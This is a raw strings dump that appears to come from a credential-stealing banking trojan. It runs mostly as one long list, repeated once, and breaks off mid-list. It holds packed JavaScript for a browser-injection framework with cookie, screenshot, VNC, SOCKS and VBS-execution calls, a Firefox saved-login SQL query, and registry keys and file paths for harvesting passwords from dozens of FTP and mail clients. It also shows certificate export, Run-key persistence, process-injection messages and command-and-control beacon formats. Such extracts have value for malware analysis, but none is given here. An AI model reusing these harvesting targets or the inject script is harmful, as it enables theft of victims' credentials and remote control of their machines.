0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
NETAPI32.dll
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
CryptImportKey
CryptDestroyKey
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyA
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
&.ipO
;&;,;3;^;
:$:,:7:?:
9”9C9
.pdata
@.reloc
c:\test_x64.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
lc:\32.dll
32.dll
echrome.dll
regsvr32.exe
%c:\~%0.8x.tmp
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
lc:\64.dll
64.dll
OSPPSVC.EXE_1948_rwx_004E0000_00058000:
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
tor2web.org
hXXps://%s.%s/favicon.ico
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('k N(j){0.F=j;0.w=p;0.O=2;0.m=k(a,b,c,d){u f=W J();u g=0;u h=(y(d)==\'G\')?t:q;u b=\'/\' 0.F \'/\' Q.V() \'/\' b;u i=p;o(h==q){0.w=p;f.I=k(){C{o(f.A==4){o(f.E!=H||f.x==\'-\'){g.w=t;o(y(d)=="k"){d(t)}}z{o(f.x==\' \'){g.w=q;o(y(d)=="k"){d(q)}}z{g.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){g.w=t;o(y(d)=="k"){d(t)}}}}f.K(a,b,h);f.L(c);o(h==q){l q}C{o(f.A==4&&f.E==H){o(f.x==\'-\'){l t}z{o(f.x==\' \'){l q}z{l f.x}}}l t}B(e){l t}};0.M=k(){l 0.w};0.1l=k(a,b,c){l 0.m(\'s\',\'1/\' a,b,c)};0.P=k(a,b){l 0.m(\'v\',\'2/\' a,p,b)};0.R=k(a,b){l 0.m(\'v\',\'3/\' a,p,b)};0.T=k(a){l 0.m(\'v\',\'4/\',p,a)};0.U=k(a,b,c){l 0.m(\'v\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,p,c)};0.X=k(a,b,c,d){l 0.m(\'s\',\'5/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.Y=k(a,b,c,d){o(y(c)==\'G\'||c==t){u e=p;u f=\'v\'}z{u e=\'Z: \' c;u f=\'s\'}l 0.m(f,\'6/\' ((b==q)?\'S\':\'D\') \'/\' a,e,d)};0.17=k(a,b,c,d){l 0.m(\'s\',\'7/\' ((b==q)?\'S\':\'D\') \'/\' a,c,d)};0.18=k(a,b,c,d){l 0.m(\'v\',\'8/\' b \'/\' c \'/\' 19(a),p,d)};0.1a=k(a,b){l 0.m(\'s\',\'9/\',a,b)};0.1b=k(a){l 0.m(\'v\',\'10/\',p,a)};0.1c=k(a,b){l 0.m(\'s\',\'11/\',a,b)};0.1d=k(a,b){l 0.m(\'s\',\'12/\',a,b)};0.1e=k(a,b,c){l 0.m(\'s\',\'13/\',a "\\r\\n" b,c)};0.1f=k(a,b){l 0.m(\'s\',\'14/\' a,1g.1h.1i,b)};0.1j=k(a){l 0.m(\'v\',\'15/\',p,a)};0.1k=k(a,b){l 0.m(\'s\',\'16/\',a,b)}};',62,84,'this||||||||||||||||||||function|return|Query||if|null|true||POST|false|var|GET|_LastAsync|responseText|typeof|else|readyState|catch|try||status|_Key|undefined|200|onreadystatechange|XMLHttpRequest|open|send|GetLastAsync|EQFramework|Version|GetVal|Math|DelVal||ClearVals|GetServer|random|new|PostServer|Get|Cookie||||||||Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|document|location|href|StopVideo|ExecVBS|SetVal'.split('|'),0,{}));
eval('var %s '
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=C j(){0.1h=o;0.w=o;0.O=3;0.l=j(a,b,c,d){s f=C L();s g=0;s h=(x(d)==\'G\')?t:p;s b=\'/\' 0.R \'/\' W.X() \'/\' b;s i=o;m(h==p){0.w=o;f.I=j(){A{m(f.B==4){m(f.E!=F||f.v==\'-\'){g.w=t;m(x(d)=="j"){d(t)}}y{m(f.v==\' \'){g.w=p;m(x(d)=="j"){d(p)}}y{g.w=f.v;m(x(d)=="j"){d(f.v)}}}}}z(e){g.w=t;m(x(d)=="j"){d(t)}}}}f.J(a,b,h);f.K(c);m(h==p){k p}A{m(f.B==4&&f.E==F){m(f.v==\'-\'){k t}y{m(f.v==\' \'){k p}y{k f.v}}}k t}z(e){k t}};0.M=j(){k 0.w};0.N=j(a,b,c){k 0.l(\'q\',\'1/\' a,b,c)};0.Q=j(a,b){k 0.l(\'u\',\'2/\' a,o,b)};0.T=j(a,b){k 0.l(\'u\',\'3/\' a,o,b)};0.U=j(a){k 0.l(\'u\',\'4/\',o,a)};0.V=j(a,b,c){k 0.l(\'u\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,o,c)};0.Y=j(a,b,c,d){k 0.l(\'q\',\'5/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.Z=j(a,b,c,d){m(x(c)==\'G\'||c==t){s e=o;s f=\'u\'}y{s e=\'17: \' c;s f=\'q\'}k 0.l(f,\'6/\' ((b==p)?\'S\':\'D\') \'/\' a,e,d)};0.18=j(a,b,c,d){k 0.l(\'q\',\'7/\' ((b==p)?\'S\':\'D\') \'/\' a,c,d)};0.19=j(a,b,c,d){k 0.l(\'u\',\'8/\' b \'/\' c \'/\' 1a(a),o,d)};0.1b=j(a,b){k 0.l(\'q\',\'9/\',a,b)};0.1c=j(a){k 0.l(\'u\',\'10/\',o,a)};0.1d=j(a,b){k 0.l(\'q\',\'11/\',a,b)};0.1e=j(a,b){k 0.l(\'q\',\'12/\',a,b)};0.1f=j(a,b,c){k 0.l(\'q\',\'13/\',a "\\r\\n" b,c)};0.1g=j(a,b){k 0.l(\'q\',\'14/\' a,H.1i.1j,b)};0.1k=j(a){k 0.l(\'u\',\'15/\',o,a)};0.1l=j(a,b){k 0.l(\'q\',\'16/\',a,b)};0.1m=j(a){s b=H.1n(a);b.1o.P(b)}};',62,87,'this|||||||||||||||||||function|return|Query|if||null|true|POST||var|false|GET|responseText|_LastAsync|typeof|else|catch|try|readyState|new||status|200|undefined|document|onreadystatechange|open|send|XMLHttpRequest|GetLastAsync|SetVal|Version|removeChild|GetVal|_Key||DelVal|ClearVals|GetServer|Math|random|PostServer|Get||||||||Cookie|Post|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|Key|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
c:\test_x32.dll
#dbgmsg
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
C:\ProgramData
%Documents and Settings%\All Users\Application Data
chrome.dll
127.0.0.1
Content-Disposition: form-data; name="%s"
--%s--
Content-Disposition: form-data; name="%s"; filename="%s"
---------------------------%u%0.4x%0.8x
Content-Type: application/x-www-form-urlencoded
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("layers.acceleration.disabled", true);
user_pref("gfx.direct2d.disabled", true);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
Dbgview.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
%s%s%u
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
regsvr32.exe "%s"
Software\Microsoft\Windows\CurrentVersion\Run
#cert
regsvr32.exe /s /i:"%u" "%s"
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
\\.\pipe\
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
dbghelp.dll
\%u.dmp
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
